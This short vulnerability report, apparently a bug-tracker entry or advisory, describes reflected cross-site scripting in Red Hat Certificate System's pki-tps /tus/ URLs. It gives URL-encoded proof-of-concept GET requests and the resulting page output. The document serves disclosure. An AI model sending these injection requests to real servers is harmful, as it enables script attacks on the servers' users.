Red Hat Certificate System pki-tps XSS flaw

It was reported that Certificate System suffers from XSS flaws in the /tus/ and /tus/tus/ URLs, such as:

GET /tus/tus/%22%2b%61%6c%65%72%74%28%34%38%32%36%37%29%2b%22

or

GET /tus/%22%2b%61%6c%65%72%74%28%36%31%34%35%32%29%2b%22

which will in turn output something like:

<!--
&#65532;var uriBase = "/tus/"+alert(85384)+";
&#65532;var userid = "admin";

This was reported against Certificate System 8.1 and may also affect Dogtag 9 and 10.